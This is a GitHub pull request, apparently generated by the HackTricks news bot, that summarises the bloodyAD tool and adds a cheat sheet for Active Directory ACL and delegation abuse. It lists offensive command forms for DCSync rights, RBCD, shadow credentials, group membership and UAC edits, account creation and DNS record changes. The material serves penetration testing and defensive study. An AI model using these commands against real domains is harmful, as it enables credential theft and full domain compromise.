Skip to content

bloodyAD User Guide — AD Privesc Swiss Army Knife #1563

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

bloodyAD User Guide — AD Privesc Swiss Army Knife #1563

wants to merge 1 commit into from

Conversation

@carlospolop
Copy link
Collaborator

@carlospolop carlospolop commented Nov 9, 2025

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

What it is
bloodyAD is a command‑line “AD Privesc Swiss Army Knife” for manipulating Active Directory objects and ACLs to enable common attack paths (e.g., DCSync, RBCD, Shadow Credentials), plus discovery helpers (BloodHound CE collector, writable objects, trusts, DNS). It authenticates over NTLM, Kerberos (TGT/password/keyfiles), PKINIT, or Schannel, and speaks LDAP/GC with optional TLS.

Executable entry point

$ bloodyAD -h


usage: bloodyAD [-h] [-d DO...


🔧 Technical Details


DCSync right assignment
Abuse domain object ACLs to add replication rights for an attacker‑controlled principal. Once granted, that principal can replicate directory secrets (NTDS credential material) via DRSUAPI, leading to full domain compromise. Command: bloodyAD add dcsync <trustee>.
Resource‑Based Constrained Delegation (RBCD)
On a target computer/service object, set msDS-AllowedToActOnBehalfOfOtherIdentity to an attacker‑controlled service account, enabling S4U2Proxy/S4U2Self‑based impersonation to the target. Command: bloodyAD add rbcd <target> <service>. Requires write permissions on that attribute and Windows Server ≥ 2012.
Shadow Credentials (KeyCredentialLink)
Write an attacker public key into msDS-KeyCredentialLink for a target account, then use PKINIT to obtain a TGT and derive the NT hash—bypassing password/RC4 requirements. Command: bloodyAD add sha...

🤖 Agent Actions


Made a concise but comprehensive bloodyAD cheat sheet focused on ACL/Delegation abuse and related AD operations.


What I updated


    

  • File: src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
    • 

  • Added a new section “bloodyAD — AD ACL/Delegation abuse from Linux (cheat sheet)” with:

      

    • Auth/transport flags (-d, -u, -p, -k with ccache/kirbi/keytab, -c for Schannel/PKINIT, -s for LDAPS, -ss debugging only)
      • 

    • Offensive primitives:

        

      • DCSync right assignment: add dcsync
        • 

      • RBCD: add rbcd and notes for using getST/Rubeus post-write
        • 

      • Shadow Credentials: add shadowCredentials with preconditions (2016+ DC schema, PKINIT/ADCS)
        • 

      • GenericAll: add genericAll
        • 

      • Group membership: add groupMember (foreign users supported)
        • 

      • UAC flagging: add uac (DONT_REQ_PREAUTH, DONT_EXPIRE_PASSWORD, etc.)
        • 

      • Account creation: add user / add computer with dNSHostName constraint note (need FQDN in -d)
        • 

      • badSuccessor: add badSuccessor DMSA setup for migration/persistence
        • 

      

      • 

    • AD-integrated DNS manipulation:

        

      • add dnsRecord with dnstype/ttl/priority/weight and a practical example
        • 

      

      • 

    • Discovery helpers:

        

      • get bloodhound, trusts, writable, dnsDump, membership, object/search usage examples
        • 

      

      • 

    • Operational notes (LDAPS recommended, Kerberos-only with ccache, --json and -v TRACE)
      • 

    

    • 



References



Reasoning


    

  • This page already aggregates AD ACL/ACE abuse techniques and even referenced bloodyAD in places, so centralizing a practical, technical bloodyAD workflow here helps chain DCSync, RBCD, Shadow Credentials, group/UAC edits, and ADIDNS manipulation in one place.
    • 

  • Avoided creating a new tool page to keep content close to the ACL/Delegation abuse tactics where operators will use it.
    • 

  • Preserved existing content and format, used clear command examples and minimal notes for preconditions and pitfalls.
    • 



No other files were modified.




This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.


📚 Repository Maintenance


    

  • MD files processed: 907
    • 

  • MD files fixed: 1
    • 



All .md files have been checked for proper formatting (headers, includes, etc.).

@carlospolop
Copy link
Collaborator Author

carlospolop commented Nov 9, 2025

🔗 Additional Context

Original Blog Post: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Content Categories: Based on the analysis, this content was categorized under "Windows / Active Directory -> ACL/Delegation Abuse (DCSync, RBCD, Shadow Credentials) and Tools (bloodyAD)".

Repository Maintenance:

  • MD Files Formatting: 907 files processed (1 files fixed)

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@carlospolop